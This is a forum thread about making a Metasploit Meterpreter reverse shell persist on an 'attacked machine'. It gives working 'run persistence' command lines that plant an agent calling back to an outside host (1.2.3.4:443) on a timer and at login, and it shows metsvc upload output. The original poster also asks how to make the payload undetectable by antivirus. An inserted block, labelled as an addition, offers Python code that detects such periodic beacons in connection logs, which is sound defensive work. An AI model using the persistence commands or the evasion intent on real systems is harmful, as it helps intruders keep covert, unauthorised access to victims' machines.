Thread: how to make a meterpreter reverse shell maintain access ?

  1. #1
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    how to make a meterpreter reverse shell maintain access ?

    Hello,

    I was wondering how to maintain access after uploading a meterpreter reverse_shell using Metasploit on the attacked machine? I know about metsvc, but it uses a bind shell.

    Any help would be appreciated, thanks in advance.

    Regards

  2. #2
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    look in /pentest/exploits/framework3/scripts/meterpreter/ for persistance.rb
    I would rather be hated for what i am,
    Then loved for what i am not.

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    take a look here:

    w w w . metasploit . com / redmine / issues / 386

    "remove the spaces, I'm not allowed to post URLs yet"

    Adds a persistent VBS payload option (keep running the payload in a loop) via the loop-vbs type in msfencode. Adds a 'persistence' script to allow easy persistent meterpreter agent deployment. "run persistence -h" for help. Sample command line:

    meterpreter> run persistence -r 1.2.3.4 -p 443 -A -X -i 300

    This would install a meterpreter agent that would try to connect to 1.2.3.4:443 once every 300 seconds. This would also start a multi/handler in the background (-A) and make this autorun when any user logs in (-X). In most scenarios, this works just fine:

    meterpreter> run persistence -A

    This uses your default IP and the default port and immediately handles the next connection, but doesn't install via the registry.
    So, after getting the meterpreter shell, type the following:
    Code:
    meterpreter > run persistence -h
    
    OPTIONS:
    
        -A        Automatically start a matching multi/handler to connect to the agent
        -X        Automatically start the agent when the system boots
        -h        This help menu
        -i <opt>  The interval in seconds between each connection attempt
        -p <opt>  The port on the remote host where Metasploit is listening
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    
    
    meterpreter >

    Give it a try, if you fail, just tell me so I can explain better...
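
Added example, not part of the original thread: from the monitoring side, the fixed `-i 300` connect-back interval described in post #3 shows up in outbound connection logs as near-constant gaps between attempts to one destination. The record layout, host names, thresholds and sample data below are assumptions constructed for illustration.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample of outbound connection records (not real telemetry):
# (epoch_seconds, source_host, destination_ip, destination_port)
SAMPLE_CONNS = [
    # WS01 retries 1.2.3.4:443 about every 300 s, as with "-i 300"
    (1000, "WS01", "1.2.3.4", 443), (1300, "WS01", "1.2.3.4", 443),
    (1602, "WS01", "1.2.3.4", 443), (1899, "WS01", "1.2.3.4", 443),
    (2201, "WS01", "1.2.3.4", 443), (2500, "WS01", "1.2.3.4", 443),
    # Irregular, user-driven traffic from the same host
    (1005, "WS01", "203.0.113.10", 443), (1010, "WS01", "203.0.113.10", 443),
    (1400, "WS01", "203.0.113.10", 443), (1420, "WS01", "203.0.113.10", 443),
    (2900, "WS01", "203.0.113.10", 443), (2950, "WS01", "203.0.113.10", 443),
    # Too few events to judge with the default threshold
    (1000, "WS02", "198.51.100.7", 80), (1300, "WS02", "198.51.100.7", 80),
    (1600, "WS02", "198.51.100.7", 80),
]

def find_beacons(conns, min_events=5, max_jitter=0.10):
    """Return {(src, dst, port): mean_gap_seconds} for flows whose gaps
    between connection attempts are near-constant (low relative spread)."""
    by_flow = defaultdict(list)
    for ts, src, dst, port in conns:
        by_flow[(src, dst, port)].append(ts)

    hits = {}
    for flow, times in by_flow.items():
        if len(times) < min_events:
            continue  # not enough samples to call it periodic
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Coefficient of variation: std deviation relative to the mean gap
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits[flow] = round(avg)
    return hits

if __name__ == "__main__":
    for (src, dst, port), gap in find_beacons(SAMPLE_CONNS).items():
        print(f"periodic connect-back: {src} -> {dst}:{port} every ~{gap}s")
```

Flagged flows are leads to correlate with autorun entries and new executables on the source host, since scheduled update checks and other legitimate software also connect at regular intervals.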

  4. #4
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Thanks guys, I'll give it a try and let you know.


  5. #5
    Member
    Join Date
    Feb 2010
    Posts
    75

    nice post thanks

  6. #6
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Hello,

    Sorry for the late reply, as I have been busy the past few days. Anyway, I tried to run the script "run metsvc" after getting a session, but I'm getting this problem:
    [*] >> Uploading metsrv.dll...
    [*] >> Uploading metsvc-server.exe...
    [*] >> Uploading metsvc.exe...
    [*] Starting the service...
    * Installing service metsvc
    Cannot create service (0x00000431)

    meterpreter >

    And when I run the persistence.rb script it works fine, but the antivirus detects a file called svchost.exe.


    Any ideas?

  7. #7

  8. #8
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Thank you, but I did read that.

    Any ideas, guys?

  9. #9
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Quote Originally Posted by AlinuX View Post
    and when i run the persistence.rb script it works fine, but the anti virus detects a file called svchost.exe.


    any ideas ?
    Turn off your antivirus?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  10. #10
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Of course it won't get detected; I need it to be undetectable to the antivirus also.

    regards
